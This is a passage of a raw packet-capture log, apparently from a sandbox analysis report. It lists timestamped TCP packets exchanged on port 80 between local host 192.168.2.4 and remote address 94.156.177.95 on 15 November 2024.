                                                                                                                Nov 15, 2024 18:14:42.021786928 CET804975094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:42.021877050 CET4975080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:42.157609940 CET4975180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:42.162755013 CET804975194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:42.162832022 CET4975180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:42.164769888 CET4975180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:42.169648886 CET804975194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:42.169694901 CET4975180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:42.174611092 CET804975194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:43.118540049 CET804975194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:43.119045019 CET4975180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:43.124310017 CET804975194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:43.124353886 CET4975180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:43.283066034 CET4975280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:43.288156033 CET804975294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:43.288239002 CET4975280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:43.289971113 CET4975280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:43.294836998 CET804975294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:43.295006037 CET4975280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:43.299901962 CET804975294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:44.288290024 CET804975294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:44.288552999 CET4975280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:44.294140100 CET804975294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:44.294229984 CET4975280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:44.434993982 CET4975380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:44.439976931 CET804975394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:44.440063000 CET4975380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:44.442001104 CET4975380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:44.446810961 CET804975394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:44.446887970 CET4975380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:44.451730013 CET804975394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:45.435973883 CET804975394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:45.436269999 CET4975380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:45.441545963 CET804975394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:45.441617966 CET4975380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:45.579090118 CET4975480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:45.584038973 CET804975494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:45.584122896 CET4975480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:45.585858107 CET4975480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:45.590749979 CET804975494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:45.590810061 CET4975480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:45.595792055 CET804975494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:46.563261032 CET804975494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:46.563404083 CET4975480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:46.568841934 CET804975494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:46.568914890 CET4975480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:46.700707912 CET4975580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:46.705776930 CET804975594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:46.705890894 CET4975580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:46.709453106 CET4975580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:46.714421988 CET804975594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:46.714498043 CET4975580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:46.719446898 CET804975594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:47.660944939 CET804975594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:47.661087990 CET4975580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:47.666395903 CET804975594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:47.666459084 CET4975580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:47.867918015 CET4975680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:47.874218941 CET804975694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:47.874294996 CET4975680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:47.876998901 CET4975680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:47.881985903 CET804975694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:47.882050991 CET4975680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:47.886936903 CET804975694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:48.863275051 CET804975694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:48.863645077 CET4975680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:48.868839025 CET804975694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:48.868911028 CET4975680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:49.021972895 CET4975780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:49.026928902 CET804975794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:49.027023077 CET4975780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:49.029119968 CET4975780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:49.034051895 CET804975794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:49.034111977 CET4975780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:49.039026976 CET804975794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:49.974807024 CET804975794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:49.974935055 CET4975780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:49.980312109 CET804975794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:49.980424881 CET4975780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:50.171080112 CET4975880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:50.175942898 CET804975894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:50.176016092 CET4975880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:50.178024054 CET4975880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:50.182918072 CET804975894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:50.182971001 CET4975880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:50.187876940 CET804975894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:51.170826912 CET804975894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:51.170948029 CET4975880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:51.176297903 CET804975894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:51.176373005 CET4975880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:51.307490110 CET4975980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:51.312473059 CET804975994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:51.312556028 CET4975980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:51.314537048 CET4975980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:51.319426060 CET804975994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:51.319509029 CET4975980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:51.324541092 CET804975994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:52.290635109 CET804975994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:52.291245937 CET4975980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:52.296732903 CET804975994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:52.299133062 CET4975980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:52.440360069 CET4976080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:52.445628881 CET804976094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:52.446660995 CET4976080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:52.448914051 CET4976080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:52.453814030 CET804976094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:52.454052925 CET4976080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:52.458921909 CET804976094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:53.435466051 CET804976094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:53.435600996 CET4976080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:53.441225052 CET804976094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:53.441279888 CET4976080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:53.578528881 CET4976180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:53.583513975 CET804976194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:53.583708048 CET4976180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:53.586914062 CET4976180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:53.591797113 CET804976194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:53.594420910 CET4976180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:53.599443913 CET804976194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:54.533124924 CET804976194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:54.533463955 CET4976180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:54.538825989 CET804976194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:54.539067030 CET4976180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:54.682460070 CET4976280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:54.687429905 CET804976294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:54.687602043 CET4976280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:54.689611912 CET4976280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:54.694447041 CET804976294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:54.694504976 CET4976280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:54.699320078 CET804976294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:56.696182966 CET804976294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:56.696356058 CET4976280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:56.701606989 CET804976294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:56.701685905 CET4976280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:56.884660006 CET4976380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:56.890018940 CET804976394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:56.890440941 CET4976380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:56.892213106 CET4976380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:56.897319078 CET804976394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:56.897576094 CET4976380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:56.902945995 CET804976394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:57.891151905 CET804976394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:57.891299009 CET4976380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:57.896446943 CET804976394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:57.896565914 CET4976380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:58.032296896 CET4976580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:58.040695906 CET804976594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:58.042032003 CET4976580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:58.043782949 CET4976580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:58.048898935 CET804976594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:58.049519062 CET4976580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:58.054426908 CET804976594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:58.995851040 CET804976594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:58.995980978 CET4976580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:59.001251936 CET804976594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:59.001323938 CET4976580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:59.149460077 CET4976780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:59.154359102 CET804976794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:59.154418945 CET4976780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:59.156507015 CET4976780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:59.161712885 CET804976794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:59.161813974 CET4976780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:59.166822910 CET804976794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:00.106925011 CET804976794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:00.107047081 CET4976780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:00.112386942 CET804976794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:00.115149021 CET4976780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:00.298732996 CET4977380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:00.303735971 CET804977394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:00.303936958 CET4977380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:00.306016922 CET4977380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:00.310940027 CET804977394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:00.310997009 CET4977380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:00.315836906 CET804977394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:01.274903059 CET804977394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:01.275022984 CET4977380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:01.280237913 CET804977394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:01.280302048 CET4977380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:01.420778990 CET4977980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:01.425848961 CET804977994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:01.426059008 CET4977980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:01.428194046 CET4977980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:01.433192015 CET804977994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:01.433269978 CET4977980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:01.438180923 CET804977994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:02.623159885 CET804977994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:02.623425007 CET4977980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:02.623583078 CET804977994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:02.623634100 CET804977994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:02.623636007 CET4977980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:02.623672962 CET4977980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:02.628530979 CET804977994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:02.762084007 CET4978580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:02.767106056 CET804978594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:02.767184973 CET4978580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:02.769289970 CET4978580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:02.774126053 CET804978594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:02.774194002 CET4978580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:02.779140949 CET804978594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:03.754801989 CET804978594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:03.759207010 CET4978580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:03.765726089 CET804978594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:03.765810966 CET4978580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:03.927130938 CET4979580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:03.932480097 CET804979594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:03.935173988 CET4979580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:03.937114954 CET4979580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:03.942403078 CET804979594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:03.942454100 CET4979580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:03.947247982 CET804979594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:04.921854019 CET804979594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:04.924438953 CET4979580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:04.930006981 CET804979594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:04.930079937 CET4979580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:05.061566114 CET4980280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:05.066698074 CET804980294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:05.066926003 CET4980280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:05.069040060 CET4980280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:05.073877096 CET804980294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:05.073941946 CET4980280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:05.078753948 CET804980294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:06.033854961 CET804980294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:06.034035921 CET4980280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:06.039433002 CET804980294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:06.039539099 CET4980280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:06.186952114 CET4980880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:06.191931009 CET804980894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:06.192004919 CET4980880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:06.194040060 CET4980880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:06.199142933 CET804980894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:06.199202061 CET4980880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:06.204097986 CET804980894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:07.183650017 CET804980894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:07.183768988 CET4980880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:07.188929081 CET804980894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:07.188998938 CET4980880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:07.350434065 CET4981380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:07.355288982 CET804981394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:07.355362892 CET4981380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:07.364787102 CET4981380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:07.370201111 CET804981394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:07.370279074 CET4981380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:07.375447035 CET804981394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:08.327786922 CET804981394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:08.327887058 CET4981380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:08.333134890 CET804981394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:08.333200932 CET4981380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:08.467777014 CET4981880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:08.472826958 CET804981894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:08.472908020 CET4981880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:08.474978924 CET4981880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:08.480079889 CET804981894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:08.480132103 CET4981880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:08.484894037 CET804981894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:09.442281008 CET804981894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:09.444468975 CET4981880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:09.449702978 CET804981894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:09.449758053 CET4981880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:09.746893883 CET4982580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:09.752048969 CET804982594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:09.752165079 CET4982580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:09.754107952 CET4982580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:09.759147882 CET804982594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:09.759212971 CET4982580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:09.764420033 CET804982594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:10.714437962 CET804982594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:10.714556932 CET4982580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:10.720088959 CET804982594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:10.720149994 CET4982580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:10.857007027 CET4983280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:10.862014055 CET804983294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:10.862103939 CET4983280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:10.864219904 CET4983280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:10.869103909 CET804983294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:10.869167089 CET4983280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:10.874162912 CET804983294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:11.828722000 CET804983294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:11.839293957 CET4983280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:11.845061064 CET804983294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:11.845119953 CET4983280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:11.989914894 CET4983680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:11.994944096 CET804983694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:11.995023966 CET4983680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:11.997169971 CET4983680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:12.002365112 CET804983694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:12.002434015 CET4983680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:12.007308006 CET804983694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:12.948380947 CET804983694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:12.948555946 CET4983680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:12.953797102 CET804983694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:12.953867912 CET4983680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:13.092339039 CET4984180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:13.097429991 CET804984194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:13.097554922 CET4984180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:13.099525928 CET4984180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:13.104549885 CET804984194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:13.104631901 CET4984180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:13.109535933 CET804984194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:14.079732895 CET804984194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:14.079858065 CET4984180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:14.085123062 CET804984194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:14.085196972 CET4984180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:14.224085093 CET4984980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:14.229012966 CET804984994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:14.229094028 CET4984980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:14.231035948 CET4984980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:14.235937119 CET804984994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:14.236002922 CET4984980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:14.240854979 CET804984994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:15.183604956 CET804984994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:15.183718920 CET4984980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:15.188874006 CET804984994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:15.188944101 CET4984980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:15.336878061 CET4985580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:15.341862917 CET804985594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:15.342014074 CET4985580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:15.343772888 CET4985580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:15.349330902 CET804985594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:15.349390984 CET4985580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:15.354389906 CET804985594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:16.283584118 CET804985594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:16.283699989 CET4985580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:16.288997889 CET804985594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:16.289061069 CET4985580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:16.421751976 CET4986080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:16.426743984 CET804986094.156.177.95192.168.2.4
